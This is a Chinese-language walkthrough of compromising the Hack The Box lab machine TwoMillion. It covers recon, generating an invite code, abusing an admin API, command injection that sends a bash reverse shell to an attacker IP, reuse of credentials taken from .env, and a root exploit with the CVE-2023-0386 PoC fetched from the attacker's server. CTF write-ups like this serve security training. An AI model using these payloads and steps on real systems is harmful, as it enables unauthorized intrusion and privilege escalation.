TwoMillion(HTB)

信息搜集

nmap

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- -min-rate 10000 10.10.11.221
[sudo] kali 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-26 16:03 CST
Nmap scan report for 2million.htb (10.10.11.221)
Host is up (0.078s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
                                                                                                           
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80,22 10.10.11.221
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-26 16:03 CST
Nmap scan report for 2million.htb (10.10.11.221)
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Hack The Box :: Penetration Testing Labs
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录和子域名

扫描无果

sudo dirsearch -u http://2million.htb

从nmap扫描的信息得到主域名

sudo echo "10.10.11.221 2million.htb" >> /etc/hosts

www-data

邀请码

点击join会重定向到/invite

要求输入邀请码

注册功能也需要邀请码才能注册

F12在invite页面中会发现一个名为inviteapi.min.js的js文件，内容如下：

即使做了js混淆，也可以明显看到verifyInviteCode和makeInviteCode函数

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 i(4){h 8={"4":4};$.9({a:"7",5:"6",g:8,b:\'/d/e/n\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}1 j(){$.9({a:"7",5:"6",b:\'/d/e/k/l/m\',c:1(0){3.2(0)},f:1(0){3.2(0)}})}',24,24,'response|function|log|console|code|dataType|json|POST|formData|ajax|type|url|success|api/v1|invite|error|data|var|verifyInviteCode|makeInviteCode|how|to|generate|verify'.split('|'),0,{}))

尝试在控制台中执行”inviteapi.min.js”文件中的makeInviteCode函数

Object { data: "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr", enctype: "ROT13" }

rot13在线解密得到

In order to generate the invite code, make a POST request to /api/v1/invite/generate

POST请求，在base64解密，成功得到邀请码

┌──(kali㉿kali)-[~]
└─$ curl -X POST http://2million.htb/api/v1/invite/generate
{"0":200,"success":1,"data":{"code":"SUFGNE4tN1FHSVEtN0o3WUYtUThBVjA=","format":"encoded"}} 

(kali㉿kali)-[~]
└─$ echo "SUFGNE4tN1FHSVEtN0o3WUYtUThBVjA=" | base64 -d
IAF4N-7QGIQ-7J7YF-Q8AV0 

在/invite输入邀请码会重定向到/register，并且邀请码填充到了里面；

随意注册一个账号，并登录

获得管理员权限

/home/access点击”Connection Pack”抓包，发现一个下载ovpn文件的api；

api漏洞常规测试：

GET /api/v1/user/vpn HTTP/1.1
GET /api/v1/user HTTP/1.1
GET /api/v1 HTTP/1.1

发现/api/v1有内容；内容是所有的api接口以及接口的作用

{
    "v1":{
        "user":{
            "GET":{
                "\/api\/v1":"Route List",
                "\/api\/v1\/invite\/how\/to\/generate":"Instructions on invite code generation",
                "\/api\/v1\/invite\/generate":"Generate invite code",
                "\/api\/v1\/invite\/verify":"Verify invite code",
                "\/api\/v1\/user\/auth":"Check if user is authenticated",
                "\/api\/v1\/user\/vpn\/generate":"Generate a new VPN configuration",
                "\/api\/v1\/user\/vpn\/regenerate":"Regenerate VPN configuration",
                "\/api\/v1\/user\/vpn\/download":"Download OVPN file"
            },
            "POST":{
                "\/api\/v1\/user\/register":"Register a new user",
                "\/api\/v1\/user\/login":"Login with existing user"
            }
        },
        "admin":{
            "GET":{
                "\/api\/v1\/admin\/auth":"Check if user is admin"
            },
            "POST":{
                "\/api\/v1\/admin\/vpn\/generate":"Generate VPN for specific user"
            },
            "PUT":{
                "\/api\/v1\/admin\/settings\/update":"Update user settings"
            }
        }
    }
}

我们的账号只是普通用户；

返回401 Unauthorized,看来是没有权限

最终发现/api/v1/admin/vpn/generateAPI接口可以将用户帐户更改为管理员帐户

返回错误的数据类型

添加”Content-type: application/json”，返回缺少参数 “email”

添加一条”email”数据，返回缺少此参数“is_admin”

返回“is_admin”只能为0或1

最终成功修改为admin账号

命令注入

/api/v1/admin/vpn/generat也是生成ovpn文件的接口；生成 VPN 密钥的可能不是 PHP 代码，而是一些生成 VPN 密钥必要信息的 Bash 工具。值得检查是否有任何命令注入。

如果服务器正在执行类似的操作gen_vpn.sh [username]，那么我将尝试;在用户名中放入username中以将其分解为新命令。我还将#在末尾添加一个以注释掉我输入后可能出现的任何内容；然后发现/api/v1/admin/vpn/generate接口存在命令注入

反弹一个shell到攻击机

nc -lnvp 5555

POST请求数据如下

{
"username":"test; bash -c 'bash -i >&  /dev/tcp/10.10.16.17/5555 0>&1';#"
}

成功反弹shell后,存在一个admin用户

www-data@2million:~/html$ ls -l /home
drwxr-xr-x 6 admin admin 4096 Jan 26 07:50 admin

在web应用默认目录下的.env文件中发现用户admin的数据库密码，

w-data@2million:~/html$ cat .env
cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

伪终端，连接数据库，在数据库中并没有找到可利用的信息，

python3 -c "import pty;pty.spawn('/bin/bash')"

尝试利用数据库密码连接admin的ssh

ssh admin@10.10.11.221
password:SuperDuperPass123

user_admin

ssh连接成功，但是在连接ssh的时候，有这样一些信息

You have mail.
Last login: Fri Jan 26 08:53:41 2024 from 10.10.14.6

利用find命令查找有关’mail’的文件

admin@2million:~$ find / -name "mail" 2>/dev/null
/snap/core20/1891/var/mail
/snap/core20/1891/var/spool/mail
/var/spool/mail
/var/mail
/usr/lib/python3/dist-packages/twisted/mail
/usr/lib/byobu/mail

根据每个目录的作用，基本可以确定在’/var’目录下

从中有一些关键词OverlayFS / FUSE说明这台机器的内核会受到影响

admin@2million:~$ cat /var/mail/admin 
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

HTB Godfather

user_root

我只是把关键词放到google；后面一些内容已经暴露了 一些exploit

其中排在google第一个的就是cve-2023-0386,文章中表明：如果系统的内核版本低于 6.2，则该系统可能容易受到攻击。

admin@2million:~$ uname -a
Linux 2million 5.15.70-051570-generic #202209231339 SMP Fri Sep 23 13:45:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
admin@2million:~$ cat /etc/lsb-release 
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.04
DISTRIB_CODENAME=jammy
DISTRIB_DESCRIPTION="Ubuntu 22.04.2 LTS"

在 GitHub 上提供了针对此漏洞的 POC。虽然内容README.md很少，但提供了足够的使用说明。

我使用git克隆到我本地，再用python服务将poc上传到目标机上

python3 -m http.server

wget -r http://10.10.16.17:8000/CVE-2023-0386

再跟着readme.md操作；

编译

make all

使用

启动两个终端，在第一个终端中输入

./fuse ./ovlcap/lower ./gc

在第二个终端输入

./exp

成功提权为root